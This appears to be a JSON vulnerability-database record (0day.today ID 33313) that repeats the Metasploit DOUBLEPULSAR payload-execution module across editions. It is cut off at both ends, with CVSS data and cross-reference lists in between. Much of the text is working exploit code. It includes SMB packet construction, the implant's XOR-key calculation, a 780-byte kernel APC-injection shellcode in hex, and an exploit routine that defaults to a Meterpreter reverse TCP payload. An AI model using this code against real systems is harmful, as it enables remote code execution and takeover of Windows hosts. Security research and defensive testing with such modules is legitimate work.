pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n"}, "lastseen": "2021-11-07T11:46:50", "differentElements": ["sourceData"], "edition": 67}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8bc0c205d41faf4fcc6b0513937f8e66", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-10T19:46:01", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-07T11:46:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-07T11:46:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": ""}, "lastseen": "2021-11-10T19:46:01", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "f7b4a950dfa38196577777902e8186fb", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-11T00:00:44", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2017-0203"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-11T00:00:44", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-11T00:00:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 